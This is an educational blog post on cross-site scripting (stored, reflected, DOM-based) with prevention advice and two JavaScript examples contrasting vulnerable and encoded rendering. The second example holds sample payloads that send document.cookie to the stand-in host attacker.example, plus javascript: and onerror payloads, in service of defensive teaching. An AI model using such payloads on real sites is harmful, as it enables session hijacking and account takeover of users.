Welcome to our OWASP Top 10 series. This series aims to equip you with the foundational security concerns of today’s cybersecurity landscape. The best resource for this is the OWASP Top 10. If you haven’t seen it, take some time to visit the page. It should be one of the primary tools in your tool-belt.
 
 
Today we’re looking at Cross-Site Scripting, or XSS for short. It’s a code injection attack and a very common one; it has been on the OWASP Top Ten since the list’s first edition. It’s not called ‘CSS’ because that abbreviation already belongs to Cascading Style Sheets, so an ‘X’ is used to indicate ‘cross’.
 
 
The idea behind an XSS attack is that a vulnerable web application is leveraged to deliver a malicious script to a victim’s browser. Once it runs there, the script can read data the browser holds for that site, such as session cookies or tokens, and the attacker can use that data to act as the victim, for example by authenticating to the site as them.
 
 
A web application that allows script to be injected into the pages it serves puts every user who visits those pages at risk. When a user loads the affected page, the injected JavaScript is executed by the user’s browser. The browser runs it because it arrived as part of the application’s own page: under the browser’s same-origin policy, script served from a site has the full privileges of that site, including access to its cookies, local storage and page content.
 
 
The attack isn’t focused on attacking the website, it’s focused on leveraging a website to attack a user.
 
 
The malicious script can hijack session cookies and tokens, perform actions in the application as the victim (which works even when the cookie itself is protected with the HttpOnly flag), rewrite the page to capture credentials, or redirect the user to a site that distributes malware.
 
 
The two main types of XSS are ‘Stored’ (also called persistent) and ‘Reflected’. Stored XSS is the larger threat because the attacker’s code is saved in the application (a comment, a profile field, a support ticket) and served to every user who later views that content, which is where the name comes from. Reflected XSS is not stored in the application: the payload travels in a request, typically a URL parameter, and the application ‘bounces’ it straight back into the response, where it runs in the browser of whoever sent the request. This type therefore requires the victim to open an attacker-crafted link, usually delivered by email, chat or another website, or to submit a crafted form.
 
 
Example:
 
 
A common way this plays out is that an attacker posts what looks like an ordinary comment on a blog or in the comment section of a website, but the comment contains JavaScript (for example inside a <script> tag or an event-handler attribute) that the application stores and later renders without encoding it. Any user who simply views the page containing that comment runs the script; no click is required, although the attacker may include a link to draw attention to the post. The script runs in the user’s browser, reads the user’s session cookies and sends them to a server the attacker controls. The attacker can then present those cookies to the web application and be treated as the logged-in user. One caveat for defenders: if the session cookie is marked HttpOnly, script cannot read it, but the injected script can still make requests to the application from inside the victim’s session, so HttpOnly limits the damage rather than preventing XSS.
 
 
There is a third type of cross-site scripting attack known as DOM-based XSS. Here the application’s own client-side JavaScript takes attacker-controlled data from the page’s environment (a ‘source’ such as the URL fragment after ‘#’, location.search, document.referrer or a postMessage payload) and writes it into the Document Object Model through a ‘sink’ such as innerHTML, document.write or eval. The payload need not ever be sent to the server, so server-side filtering never sees it; the vulnerability is the client-side code writing untrusted data into the DOM without encoding it for the sink it uses.
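The source-to-sink path described above, as an added example that is not code from the original post. It simulates the browser pieces in plain Node so it runs without a DOM: a page script is assumed to read a search term from location.hash and display it, and the shop.example URL, the element stand-in and the payload are all constructed for this example.

```javascript
// Added example, not code from the original post: a DOM-based XSS source/sink
// pair, simulated in plain Node so it runs without a browser. The page script is
// assumed to read a search term from location.hash and display it; the URL,
// element stand-in and payload are all constructed for this example.

// Source: the fragment. Browsers never send it in the request, so no server-side
// validation, WAF rule or access log ever sees the payload.
function requestLineSeenByServer(url) {
  const u = new URL(url);
  return u.pathname + u.search;
}

// The value a real page would get from location.hash.slice(1) after decoding the
// percent-encoding the browser applied to characters such as '<' and space.
function fragmentValue(url) {
  return decodeURIComponent(new URL(url).hash.slice(1));
}

// Minimal stand-in for a DOM element. Only the distinction that matters is
// modelled: innerHTML hands the string to the HTML parser, textContent does not.
function makeElement() {
  return { innerHTML: "", textContent: "", parsedAsMarkup: false };
}

// Sink 1 (vulnerable): untrusted text is concatenated into markup and parsed.
function renderResultsUnsafe(url, el) {
  el.innerHTML = "<p>Results for " + fragmentValue(url) + "</p>";
  el.parsedAsMarkup = true;
  return el;
}

// Sink 2 (fixed): the same text goes through textContent, so '<' stays a
// literal character and the browser creates no element from it.
function renderResultsSafe(url, el) {
  el.textContent = "Results for " + fragmentValue(url);
  el.parsedAsMarkup = false;
  return el;
}

// Would anything the element now holds execute? Only parsed markup can, and only
// if it carries a script tag or an inline event-handler attribute.
function wouldExecuteScript(el) {
  if (!el.parsedAsMarkup) return false;
  return /<script\b/i.test(el.innerHTML) ||
         /<[a-z][^>]*\son[a-z]+\s*=/i.test(el.innerHTML);
}

// Constructed crafted link; the victim only has to open it.
const CRAFTED_URL =
  'https://shop.example/search#<img src=x onerror="alert(document.cookie)">';

// Stand-alone run: the server sees "/search", the innerHTML sink executes,
// the textContent sink shows the payload as harmless text.
console.log(requestLineSeenByServer(CRAFTED_URL));
console.log(wouldExecuteScript(renderResultsUnsafe(CRAFTED_URL, makeElement())));
console.log(wouldExecuteScript(renderResultsSafe(CRAFTED_URL, makeElement())));
```

The point to take from the first function is that the request the server receives ends at the path and query string; a crafted fragment is invisible to server-side validation, so a DOM-based flaw has to be fixed in the client-side code by choosing a non-parsing sink (textContent, setAttribute on a non-event attribute) or encoding for the sink actually used.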
 
 
How to prevent it. 
 
 
When developing web applications:
 
  • Input Validation: Make sure that every field accepting user input is validated. White-list what each field may contain, accepting only approved characters, formats and values and rejecting the rest; an age field never needs ‘<’, and an email address has a known shape. Validation raises the bar, but it is not sufficient on its own: some fields legitimately need characters like ‘<’ or quotes, and data can enter through paths other than forms (APIs, file uploads, imported records).
  • Escape: Output encoding is the primary defense. Whenever user-supplied data is written into a page, encode it for the exact context it lands in: HTML body, HTML attribute (and always quote the attribute), JavaScript string, URL, or CSS. Each context has its own rules, and an encoder for one context does not protect another.
  • Sanitize: Where users are allowed to submit rich content (formatted comments, profile pages), encoding would destroy the formatting, so sanitize instead: pass the HTML through a maintained sanitizer library that white-lists safe tags and attributes and strips everything else, rather than writing your own filter.
  • Defense in depth: Mark session cookies HttpOnly so script cannot read them, and deploy a Content Security Policy that disallows inline script. Neither fixes the underlying bug, but both reduce what a successful injection can do.
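The comment scenario from the example above, rendered first the vulnerable way and then with the context-specific encoding the list describes, as an added example that is not code from the original post. The comment fields, the blog markup and attacker.example are constructed for this example; the three encoders are illustrative implementations, not a library the post recommends.

```javascript
// Added example, not code from the original post: a blog comment rendered by
// string concatenation (vulnerable) next to the same comment rendered with output
// encoding chosen per context. The comment, the markup and attacker.example are
// constructed for this example.

// HTML text and quoted-attribute context: the five characters that can change
// how the parser reads the markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: hex-escape everything outside a small
// allow-list, so the value can neither close the quote nor end the <script>.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._-]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// URL context: validate rather than encode. Only http(s) links are allowed;
// javascript:, data: and anything unparseable collapse to a harmless "#".
function safeHref(s) {
  try {
    const u = new URL(String(s));
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : "#";
  } catch {
    return "#";
  }
}

// Vulnerable: every field is concatenated into the page as-is.
function renderCommentUnsafe(c) {
  return `<div class="comment" data-author="${c.author}">` +
         `<a href="${c.website}">${c.author}</a>: ${c.body}` +
         `<script>var lastAuthor = "${c.author}";</script></div>`;
}

// Fixed: same template, each field encoded for the context it lands in.
// Attribute values stay quoted; encoding an unquoted attribute is not enough,
// because a space alone would start a new attribute.
function renderCommentSafe(c) {
  return `<div class="comment" data-author="${escapeHtml(c.author)}">` +
         `<a href="${escapeHtml(safeHref(c.website))}">${escapeHtml(c.author)}</a>: ${escapeHtml(c.body)}` +
         `<script>var lastAuthor = "${escapeJsString(c.author)}";</script></div>`;
}

// Crude audit of rendered markup: which executable footholds does it contain?
// Tags are scanned attribute by attribute, so an encoded "onmouseover=" that is
// still inside a quoted value is correctly not counted as a handler.
function executableFootholds(html) {
  const found = { scriptTags: 0, eventHandlers: 0, jsUrls: 0, jsLiteralIntact: false };
  const tagRe = /<([a-z][a-z0-9-]*)\b([^>]*)>/gi;
  const attrRe = /([a-z][a-z0-9-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    if (tag[1].toLowerCase() === "script") found.scriptTags++;
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const name = attr[1].toLowerCase();
      const value = attr[2].replace(/^["']|["']$/g, "");
      if (name.startsWith("on")) found.eventHandlers++;
      if ((name === "href" || name === "src") && /^\s*javascript:/i.test(value)) found.jsUrls++;
    }
  }
  // The inline string literal must still be one quoted token that ends the statement.
  found.jsLiteralIntact =
    /var lastAuthor = "(?:[^"\\<]|\\x[0-9a-f]{2}|\\u[0-9a-f]{4})*";<\/script>/.test(html);
  return found;
}

// Constructed attacker comment: one payload per context the template exposes.
const ATTACKER_COMMENT = {
  author: `" onmouseover="fetch('https://attacker.example/?c='+document.cookie)`,
  website: "javascript:alert(document.cookie)",
  body: "Great post! <script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
};

console.log(executableFootholds(renderCommentUnsafe(ATTACKER_COMMENT)));
console.log(executableFootholds(renderCommentSafe(ATTACKER_COMMENT)));
```

Running it shows the unsafe render carrying two script tags, an inline event handler and a javascript: link, with the inline string literal broken open, while the safe render keeps only the page’s own script tag and shows the attacker’s text as literal text. The audit function is a tripwire for this example, not a substitute for a real HTML parser or sanitizer.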

When browsing web applications:

  • Trust: Only follow links from sources you trust, and remember that a stored XSS payload lives on the trusted site itself, so trust in the site alone is not a guarantee.
  • Interrogate: Examine hyperlinks before following them. Don’t follow shortened (‘tiny’) URLs you aren’t sure about, hover over links to see the real destination before clicking, and be suspicious of links whose query string or fragment contains markup such as ‘<’, ‘script’ or ‘onerror’, or long runs of percent-encoded characters.

I hope this provided a good overview of the cross-site scripting (XSS) attack and equipped you with ways to reduce this risk. If you’re a business that is considering the risk of this in your environment, start by looking at your hosted applications. Do you host external, web-facing applications? If so, do any of those applications allow input from guest users? If so, take the time to sit down with the developer and ask the open-ended question “what is being done to prevent XSS on this web application?” If they don’t mention things like ‘output encoding’, ‘input validation’, ‘white-listing’ or ‘sanitization’, I recommend reaching out to us at Asher Security or calling another qualified cybersecurity consultant to review the application for you.

To help reduce the risk of your user credentials being used maliciously, I recommend adding a simple one-page overview on XSS in your security awareness training. Highlight and focus on how to prevent it while browsing the web and following hyperlinks.

 

Please post any questions or comments below and we will try to respond.

 
